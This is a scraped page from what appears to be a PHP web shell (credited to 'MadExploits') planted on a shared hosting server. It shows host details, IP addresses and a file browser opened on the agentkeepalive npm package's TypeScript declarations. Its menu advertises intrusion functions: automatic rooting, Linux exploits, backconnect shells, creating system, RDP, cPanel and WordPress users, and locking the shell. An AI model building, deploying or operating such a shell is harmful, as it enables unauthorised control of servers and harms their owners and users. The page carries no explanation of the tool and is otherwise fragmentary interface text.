Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.36
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
agentkeepalive /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
History.md
4.73
KB
-rw-r--r--
README.md
8.15
KB
-rw-r--r--
browser.js
144
B
-rw-r--r--
index.d.ts
1.05
KB
-rw-r--r--
index.js
114
B
-rw-r--r--
package.json
2.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
declare module "agentkeepalive" { import * as http from 'http'; import * as https from 'https'; interface AgentStatus { createSocketCount: number, createSocketErrorCount: number, closeSocketCount: number, errorSocketCount: number, timeoutSocketCount: number, requestCount: number, freeSockets: object, sockets: object, requests: object, } interface HttpOptions extends http.AgentOptions { freeSocketKeepAliveTimeout?: number; timeout?: number; socketActiveTTL?: number; } interface HttpsOptions extends https.AgentOptions { freeSocketKeepAliveTimeout?: number; timeout?: number; socketActiveTTL?: number; } class internal extends http.Agent { constructor(opts?: HttpOptions); readonly statusChanged: boolean; createSocket(req: http.IncomingMessage, options: http.RequestOptions, cb: Function): void; getCurrentStatus(): AgentStatus; } namespace internal { export class HttpsAgent extends internal { constructor(opts?: HttpsOptions); } } export = internal; }
Close